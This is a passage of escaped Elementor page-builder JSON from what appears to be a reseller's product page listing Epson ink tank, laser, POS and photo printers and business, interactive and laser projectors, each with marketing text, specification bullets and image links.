]<\\/center><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"5178d20\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"b031280\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"b3a013d\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"f2b7b04\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"c71ec36\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"732a1a6\",\"elType\":\"widget\",\"settings\":{\"title\":\"INK TANK SYSTEM\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e709cb3\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"60cd262\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"97d2102\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson EcoTank L3150<\\/strong><\\/h4><p><img class=\\\"wp-image-2421 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EcoTank-L3150-.jpg\\\" alt=\\\"\\\" width=\\\"311\\\" height=\\\"175\\\" \\/><\\/p><p>Save more with Epson\\u2019s economical and multifunctional printing solutions for business\\u2014the EcoTank L3150\\u2014built to bring down costs, and bring up productivity. The integrated ink tank enables spill-free, error-free refilling with individual bottles that have designated nozzles. Other features include borderless 4R printing and an ultra-high yield of 7,500 coloured and 4,500 black-and-white pages. The EcoTank L3150 also delivers the convenience of wireless connectivity, allowing direct printing from smart devices.<\\/p><ul><li>Compact integrated tank design<\\/li><li>High yield ink bottles<\\/li><li>Spill-free, error-free refilling<\\/li><li>Wi-Fi, Wi-Fi Direct<\\/li><li>Epson Connect (Epson iPrint, Epson Email Print and Remote Print Driver)<\\/li><li>Borderless printing up to 4R<\\/li><\\/ul><div><center>[maxbutton id=\\\"12\\\" ]<\\/center><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"63366b2\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8449cce\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson L120 Printer\\u00a0<\\/strong><br \\/><br \\/><img class=\\\"alignnone wp-image-2422\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-L120-Printer.png\\\" alt=\\\"\\\" width=\\\"301\\\" height=\\\"170\\\" \\/><\\/h4><p>The Epson L120 ink tank system printer brings speedy performance with low running costs to all your personal and work projects.<\\/p><ul><li>High-yield ink bottles<\\/li><li>Print speed up to 8.5ipm for black-and-white and 4.5ipm for color<\\/li><li>Compact Size<\\/li><li>Warranty of 2 Years or 20,000 Pages, whichever comes first<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"9109035\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":164,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"140f583\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div style=\\\"text-align: center;\\\">[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"7d56d33\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a539e2b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson M1100 Printer<\\/strong><\\/h4><p><img class=\\\"wp-image-2423 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-M1100-Printer-.png\\\" alt=\\\"\\\" width=\\\"315\\\" height=\\\"178\\\" \\/><\\/p><p>Efficiency\\u00a0meets economy with the EcoTank monochrome M1100 printer. Look forward to lower business costs with bottles that provide an ultra-high page yield of up to 6,000 pages\\u00a0each. Simplify processes with the integrated ink tank that enables spill - and error-free ink refilling, and enjoy laser-quality text that is smudge-proof and water-resistant with the pigment ink.<\\/p><ul><li>Compact integrated tank design<\\/li><li>High-yield pigment ink bottle<\\/li><li>Spill-free, error-free refilling<\\/li><li>Print speed up to 32ppm (15ipm)<\\/li><li>4 years warranty<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"e74569a\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":60,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"e157d4e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div><center>[maxbutton id=\\\"12\\\" ]<\\/center><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2ffcc87\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c140b6d\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0c8225a\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"b3a6fcb\",\"elType\":\"widget\",\"settings\":{\"title\":\"LASER PRINTER\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a7c8449\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"650cf58\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"82105a8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson AcuLaser C9300N<\\/strong><\\/h4><p><img class=\\\"alignnone wp-image-2424\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-AcuLaser-C9300N.png\\\" alt=\\\"\\\" width=\\\"313\\\" height=\\\"177\\\" \\/><\\/p><p>The Epson AcuLaser\\u2122 C9300N breaks new ground with its class-leading 1200dpi standard resolution for A3 colour laser printing. Together with its fast speed and high reliability, it packs superior performance in a cost efficient design that perfectly complements the needs of demanding workgroups.<\\/p><ul><li>1200 x 1200 dpi<\\/li><li>Speed: Up to 30ppm<\\/li><li>First page out in 8.3 sec or less (mono A4), 9.9 sec (colour A4)<\\/li><li>Quality prints with new Epson Technologies<\\/li><li>New print job management features<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"ee8d71a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div style=\\\"text-align: center;\\\">[maxbutton id=\\\"12\\\" ]<\\/div>\",\"_margin\":{\"unit\":\"px\",\"top\":\"18\",\"right\":\"18\",\"bottom\":\"18\",\"left\":\"18\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"8295a6c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"22e2324\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\">\\u00a0<strong>Epson WorkForce AL-M320DN\\u00a0<\\/strong><\\/h4><p><img class=\\\"alignnone wp-image-2426\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-AL-M320DN-.jpg\\\" alt=\\\"\\\" width=\\\"254\\\" height=\\\"296\\\" \\/><\\/p><p>The Workforce AL-M320DN delivers absolute performance and reliability despite their compact size. Equipped with network printing capabilities and blazing fast performance to support ultra-high volume printing, these printers are built for the most demanding office environments. Further boost productivity with the free fleet management software, Epson Device Admin, to organise and monitor printers remotely.<\\/p><ul><li>1200 x 1200 dpi<\\/li><li>Print speed up to 35ppm<\\/li><li>Auto-Duplex<\\/li><li>Ethernet &amp; Epson iPrint<\\/li><li>2 optional paper cassette tray<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"e06a550\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div style=\\\"text-align: center;\\\">[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"49ae59d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6612146\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson WorkForce AL-M8100DN\\u00a0<\\/strong><br \\/><br \\/><img class=\\\"alignnone wp-image-2427\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-AL-M8100DN-.png\\\" alt=\\\"\\\" width=\\\"256\\\" height=\\\"144\\\" \\/><\\/h4><p><br \\/><br \\/>Unleash remarkable efficiency to your workflow. Powered by a 600Mhz dual core processor, the WorkForce AL-8100DN delivers quality A3 and A4 prints with swift speeds of up to 40ppm and is packed with 1GB RAM for faster processing of multiple print jobs.<\\/p><ul><li>1200 x 1200 dpi<\\/li><li>Print speed up to 40 ppm<\\/li><li>Epson iPrint<\\/li><li>Ethernet<\\/li><li>4 optional cassette trays<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"3432510\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div style=\\\"text-align: center;\\\">[maxbutton id=\\\"12\\\" ]<\\/div>\",\"_margin\":{\"unit\":\"px\",\"top\":\"47\",\"right\":\"47\",\"bottom\":\"47\",\"left\":\"47\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d3590c0\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"7139e3e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"77f919a\",\"elType\":\"widget\",\"settings\":{\"title\":\"POS PRINTER\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6011ab1\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"751b93e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"14d70f4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson TM-H6000IV\\u00a0<\\/strong><\\/h4><p><img class=\\\"wp-image-2428 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-TM-H6000IV.png\\\" alt=\\\"\\\" width=\\\"224\\\" height=\\\"125\\\" \\/><\\/p><p>The Epson multifunction POS printer TM-H6000IV, features everything retailers need from fast receipt printing and check processing to best-in-class reliability.<\\/p><ul><li>Thermal &amp; Dot Output<\\/li><li>Speed: Up to 300mm\\/sec<\\/li><li>Check printing<\\/li><li>Bi-directional printing<\\/li><li>Supports\\u00a0slip printing, validation and endorsement print<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"ecb5d15\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div><center>[maxbutton id=\\\"12\\\" ]<\\/center><\\/div>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"48313a9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"04c8d3f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson TM-T88V-i\\u00a0<\\/strong>\\n\\n<img class=\\\"alignnone wp-image-2429\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-TM-T88V-i.png\\\" alt=\\\"\\\" width=\\\"243\\\" height=\\\"137\\\" \\/><\\/h4>\\nCreate a world of possibilities with TM-T88V-i Intelligent Solution. Equipped with cloud and web-capabilities, you\'ll have access to a variety of intelligent functions delivered by a compact, space-saving printer that fits easily into your business.\\n<ul>\\n \\t<li>Printing speed of up to 300mm\\/second<\\/li>\\n \\t<li>20 million lines for printer mechanism<\\/li>\\n \\t<li>Up to 2 million for auto-cutter<\\/li>\\n \\t<li>LAN, Serial, USB 2.0 (Type A) x 4<\\/li>\\n \\t<li>Control peripherals easily<\\/li>\\n<\\/ul>\\n<div><center>[maxbutton id=\\\"12\\\" ]<\\/center><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a458653\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"693238f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson TM-T70II\\u00a0<\\/strong><br \\/><br \\/><img class=\\\"alignnone wp-image-2430\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-TM-T70II.png\\\" alt=\\\"\\\" width=\\\"254\\\" height=\\\"143\\\" \\/><br \\/><br \\/><\\/h4><p>The Epson\'s TM-T70II is the smallest in class receipt printer with a full frontal operation.<\\/p><ul><li>Print method: Thermal line printing<\\/li><li>Width: 79\\u00a0\\u00b1\\u00a00.5 mm<\\/li><li>Print Speed: Up to 250 mm\\/ sec<\\/li><li>Auto-cutter feature<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"c9f74e5\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div><center>[maxbutton id=\\\"12\\\" ]<\\/center><\\/div>\",\"_margin\":{\"unit\":\"px\",\"top\":\"77\",\"right\":\"77\",\"bottom\":\"77\",\"left\":\"77\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"633089e\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e7998e8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"ca5c009\",\"elType\":\"widget\",\"settings\":{\"title\":\"PHOTO PRINTER\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9e7182b\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"7eee589\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4c63255\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson L1800 A3 Photo Ink Tank Printer<\\/strong><\\/p><p><img class=\\\"alignnone size-full wp-image-2431\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-L1800-Printer.png\\\" alt=\\\"\\\" width=\\\"550\\\" height=\\\"310\\\" \\/><\\/p><p>In creating the next wave of printing innovation, Epson introduces the worlds first truly affordable 6-colour A3+ original ink tank system printer.<\\/p><ul><li>Yield of up to 1,500 4R photos<\\/li><li>Print speed up to 15ppm<\\/li><li>High-yield ink bottles<\\/li><li>1-year warranty or 9,000 prints<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"4abe3ef\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9645bf2\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson L850 Printer\\u00a0<\\/strong><img class=\\\"alignnone wp-image-2432\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-L850-Printer.png\\\" alt=\\\"\\\" width=\\\"261\\\" height=\\\"147\\\" \\/><\\/p><p>Imaging enthusiasts and professionals can look forward to the 6-colour ink tank system, presenting vibrant borderless prints and unrivalled performance at a remarkably low cost through this 3-in-1 photo printer.<\\/p><ul><li>High-yield ink bottles<\\/li><li>2.7 colour LCD screen<\\/li><li>Direct printing via memory card slot, USB port and PictBridge<\\/li><li>CD\\/DVD printing<\\/li><li>Warranty of 1 year or 3,000 photo prints, whichever comes first<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"07c207b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8ce4aa3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson L805 Printer\\u00a0<\\/strong><img class=\\\"alignnone wp-image-2433\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-L805-Printer-.png\\\" alt=\\\"\\\" width=\\\"240\\\" height=\\\"135\\\" \\/><\\/p><p>The L805s integrated Wi-Fi support and expanded colour gamut of 6 inks brings you ease of printing from your mobile devices over a wireless network so you can print low-cost, lab-quality photos at your convenience.<\\/p><ul><li>Yield of Up to 1,800 4R photos<\\/li><li>Lowest Printing Costs<\\/li><li>Wi-Fi &amp; Epson iPrint<\\/li><li>CD\\/DVD Printing Capability<\\/li><li>1 year or 3,000 prints warranty<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"65279bf\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c65e6e9\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"57b8f7e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Projectors for Work\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"bbe338f\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"4e4173d\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"1c6bf5d\",\"elType\":\"widget\",\"settings\":{\"title\":\"CORPORATE AND EDUCATION\\u00a0\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7e9242e\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"61d6693\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"bd3c8b4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson EB-2055<\\/strong><\\/p><p><img class=\\\"alignnone wp-image-2434\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-2055.png\\\" alt=\\\"\\\" width=\\\"245\\\" height=\\\"163\\\" \\/><\\/p><p>Leave the lights on and take control whether in the meeting room or classroom. Epson\\u2019s EB-2055 projector is engineered to shine outstandingly even in well-lit environments to enrich your presentation experience. Your brilliant presentations are made even better and more convenient with the new gesture-control function that allows you to navigate between your slides without the use of a peripheral device.<\\/p><ul><li>XGA Resolution<\\/li><li>White and Colour Light Output at 5,000 lumens<\\/li><li>Gesture Presenter<\\/li><li>Multi-PC Projection<\\/li><li>2 x HDMI<\\/li><li>Split Screen<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a9b5eee\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"fe4d6fd\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson EB-2142W<\\/strong>\\u00a0<img class=\\\"alignnone wp-image-2435\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-2142W.jpg\\\" alt=\\\"\\\" width=\\\"245\\\" height=\\\"138\\\" \\/><\\/p><p>Enjoy success and unparalleled performance with Epson business projectors. Fully maximise your office space and experience a variety of connectivity options for your ultimate convenience. Along with long lamp-life and maintenance cycles, potential for saving costs and improving energy efficiency is now made possible for you. Every component is skillfully innovated with attention to detail in mind, including the integrated 3LCD technology that will provide you with stunning colour brightness for quality images.<\\/p><ul><li>White and Colour Brightness at 4,200lm<\\/li><li>WXGA Resolution<\\/li><li>12000 hours lamp life in eco-mode<\\/li><li>MHL-enabled<\\/li><li>Multi-PC Projection<\\/li><li>Horizontal Keystone Slider<\\/li><li>Miracast<sup>\\u00ae<\\/sup><\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<span style=\\\"font-size: 10.5px;\\\"><br \\/><\\/span><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"24b65ae\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a26a32f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson EB-L500W\\u00a0<\\/strong><img class=\\\"wp-image-2436 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-L500W.jpg\\\" alt=\\\"\\\" width=\\\"251\\\" height=\\\"142\\\" \\/><\\/p><p>The compact, affordable EB-L500W laser projector delivers powerful performance for education and business applications. Get bright, vivid images with 5,000 lumens colour\\/white brightness. This wireless projector also offers WXGA resolution and Full HD support. Featuring breakthrough laser technology, it delivers a laser light source of up to 20,000 hours. And, it offers virtually maintenance-free operation for the life of the optical engine. Plus, it features a Dynamic contrast ratio of up to 2,500,000:1. It also includes wireless networking with enterprise-level security, and advanced installation features.<\\/p><ul><li>5,000 lumens colour\\/white brightness<sup>\\u00a0<\\/sup><\\/li><li>Colourful WXGA; up to 2,500,000:1 Dynamic contrast ratio<\\/li><li>Laser light source of up to 20,000 hours<\\/li><li>Virtually maintenance-free for optical engine life<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"cd625e2\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"8750887\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"c4ec64b\",\"elType\":\"widget\",\"settings\":{\"title\":\"ACCENT LIGHTING LASER PROJECTORS\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5f02a57\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"993393a\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e46d09c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson LightScene EV-105<\\/strong><\\/p><p><img class=\\\"wp-image-2437 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-LightScene-EV-105.jpg\\\" alt=\\\"\\\" width=\\\"263\\\" height=\\\"176\\\" \\/><\\/p><p>Create stunning visual displays and immersive environments with the LightScene EV-105, the cutting-edge digital signage solution from Epson. A convergence of lighting and display technology, LightScene laser projectors captivate audiences by simultaneously illuminating and projecting on virtually any surface or material, unleashing dynamic, experiential content for digital art, commercial signage and d\\u00e9cor applications. Designed to blend in discreetly to any setting \\u2014 from retail, hospitality and event spaces to showrooms and museums \\u2014 LightScene EV-105 offers a sleek, black spotlight design, with an array of configuration, mounting and programming options.<\\/p><ul><li>Laser projector for digital art and signage<\\/li><li>Seamlessly blends into virtually any environment<\\/li><li>Up to 20,000 hours of virtually maintenance-free operation<\\/li><li>360-degree mounting: floors, walls or ceilings<\\/li><li>Remote management and control tools<\\/li><li>Best New Award Overall<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b9132fb\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"5a3decf\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"ccb5acc\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"45f89fa\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e7ec2bf\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>ULTRA PORTABLE<\\/h3><p><strong>Epson EB-1785W\\u00a0<\\/strong><\\/p><p><img class=\\\"alignnone wp-image-2438\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-1785W.png\\\" alt=\\\"\\\" width=\\\"236\\\" height=\\\"133\\\" \\/><\\/p><p>The Epson EB-1785W packs superior imaging quality along with a suite of connectivity and usability features into a body weighing only 1.83kg and 44mm slim. Wirelessly connect your smart devices to the projector via Wi-Fi, Miracast, iProjection application or NFC technology. The EB-1785W comes with Gesture Presenter technology, which allows you to transit between slides without a clicker. Lastly, with Epson\'s 3LCD technology that delivers up to 3 times wider colour gamut and brightness, you can astound audiences anywhere you go.<\\/p><ul><li>White Light Output 3,200 lumens, Colour Light Output 3,200 lumens<\\/li><li>WXGA Resolution<\\/li><li>Real-Time Auto Keystone Correction<\\/li><li>Split Screen Projection<\\/li><li>Hassle-Free Presentation with USB 3-in-1 Display Feature and Epson iProjection<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1914d98\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"b5f42fd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"e3f8c24\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"d81ddc4\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"890a1d6\",\"elType\":\"widget\",\"settings\":{\"title\":\"INTERACTIVE\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c314a77\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"fbcb210\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"1897c27\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson EB-536Wi\\u00a0<\\/strong><\\/p><p><img class=\\\"alignnone wp-image-2439\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-536Wi.png\\\" alt=\\\"\\\" width=\\\"242\\\" height=\\\"136\\\" \\/><\\/p><p>Project large screen sizes even at close range and make your presentations larger-than-life with Epson EB-536Wi projector.<\\/p><ul><li>White and Colour Brightness at 3,400lm<\\/li><li>WXGA Resolution<\\/li><li>Multi-PC projection<\\/li><li>HDMI Connectivity<\\/li><li>Pen Interactivity<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a597712\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d315157\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson 595Wi\\/585Wi\\/575Wi<\\/strong>\\u00a0<img class=\\\"alignnone wp-image-2440\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-595Wi.png\\\" alt=\\\"\\\" width=\\\"276\\\" height=\\\"155\\\" \\/><\\/p><p>With the finger-touch interactive function and PC-free annotation, you can easily transform any surface into an interactive environment so everyone can throw their ideas on the table.<\\/p><ul><li>WXGA Resolution<\\/li><li>White and Colour Brightness at 3,300lm<\\/li><li>Multi-PC projection<\\/li><li>HDMI Connectivity x2<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" 